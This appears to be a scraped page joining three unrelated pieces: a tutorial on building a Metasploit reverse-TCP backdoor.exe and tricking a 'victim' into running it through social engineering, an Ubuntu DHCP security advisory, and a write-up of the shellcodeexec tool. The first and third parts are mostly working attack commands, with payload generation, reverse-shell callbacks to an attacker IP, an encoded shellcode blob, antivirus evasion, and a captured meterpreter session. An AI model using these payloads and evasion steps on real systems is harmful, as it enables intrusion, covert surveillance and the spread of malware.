Hack Windows 7 with Metasploit

In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe


I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.


Launch Metasploit and set the exploit by typing these commands in your msfconsole:


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit

If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.

DHCP vulnerability in some Ubuntu releases

Ubuntu Security Notice USN-1108-2
April 19, 2011

dhcp3 vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 9.10

Summary:

An attacker's DHCP server could send crafted responses to your computer and
cause it to run programs as root.

Software Description:
- dhcp3: DHCP Client 

Details:

USN-1108-1 fixed vulnerabilities in DHCP. Due to an error, the patch to fix
the vulnerability was not properly applied on Ubuntu 9.10 and higher. This
update fixes the problem.

Original advisory details:

 Sebastian Krahmer discovered that the dhclient utility incorrectly filtered
 crafted responses. An attacker could use this flaw with a malicious DHCP
 server to execute arbitrary code, resulting in root privilege escalation.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
  dhcp3-client                    3.1.3-2ubuntu6.2

Ubuntu 10.04 LTS:
  dhcp3-client                    3.1.3-2ubuntu3.2

Ubuntu 9.10:
  dhcp3-client                    3.1.2-1ubuntu7.3

In general, a standard system update will make all the necessary changes.

References:
  CVE-2011-0997

Package Information:
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu6.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.3-2ubuntu3.2
  https://launchpad.net/ubuntu/+source/dhcp3/3.1.2-1ubuntu7.3

Bypass Antivirus Protection And Execute Metasploit Payloads

Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Protection!
Picture this – you are performing a penetration test and you find a unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit and your execute from memory meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script to execute in memory a sequence of opcodes. Its current features include:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

How to use shellcodeexec?
The author presents perfect examples to run the tool. We have listed them as under:
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:

1	$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

Or for a Windows target:

1	$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:

1	$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

Or for a Windows target:

1	$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:

1	$ ./shellcodeexec

Or, on the Windows target:

1	C:WINDOWSTemp>shellcodeexec.exe

Download shellcodeexec (inquisb-shellcodeexec.zip) here.

2nd:

Background

Most of the shellcode launchers out there, including proof of concepts part of many security books, detail how to allocate a memory page as readable/writable/executable on POSIX systems, copy over your shellcode and execute it. This works just fine. However, it is limited to POSIX, does not necessarily consider 64-bit architecture and Windows systems.

Description

This script and the relevant project files (Makefile and Visual Studio files) allow you to compile the tool once then run your shellcode across different architectures and operating systems.

Moreover, it solves a common real world issue: the target system's anti virus software blocking a Metasploit-generated payload stager (either EXE of ELF). Take for instance the following command line:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe

This generates a Metasploit payload stager, payload.exe, that as soon as it lands on the AV-protected target system is recognized as malicious and potentially blocked (depending on the on-access scan settings) by many anti virus products. At the time of writing this text, 21 out 41 anti viruses detect it as malicious. By encoding it multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and guides about packing, compressing, obfuscating and applying IDA-foo to portable executables et similar in order to narrow down the number of AV products that can detect it as a malicious file. This is all interesting, but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid all this hassle? This is exactly where this tool comes into play!

Features

shellcodeexec:

• Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
• Can be compiled and works on 32-bit and 64-bit architectures.
• As far as I know, no AV detect it as malicious.
• Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx - Readable Writable and eXecutable.
• It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
• Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.

Example

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E
4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KR
ZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP
4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6Nk
VlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQ
xVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeR
pV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7
E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKO
N5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC
1KsVIO6OuZVCEXlISAA

2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:

C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4L
KV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPP
RQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4Nk
EQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlR
kNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxV
SGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV
0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8N
yI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5L
KP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1Ks
VIO6OuZVCEXlISAA

If you head back to the terminal where the multi/handler is running you will happily see:

$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E

[*] Please wait while we load the module tree...

[...]

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]

+ -- --=[ 673 exploits - 354 auxiliary

+ -- --=[ 217 payloads - 27 encoders - 8 nops

=[ svn r12306 updated 7 days ago (2011.04.07)

PAYLOAD => windows/meterpreter/reverse_tcp

EXITFUNC => thread

LPORT => 4444

LHOST => 192.168.136.1

[*] Started reverse handler on 192.168.136.1:4444

[*] Starting the payload handler...

[*] Sending stage (749056 bytes) to 192.168.136.129

[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011

meterpreter > sysinfo

System Language : en_US

OS : Windows .NET Server (Build 3790, Service Pack 2).

Computer : W2K3R2

Architecture : x86

Meterpreter : x86/win32

The tool along with compilation files for POSIX and Windows systems can be found on my GitHub at https://github.com/inquisb/shellcodeexec.
Thanks for reading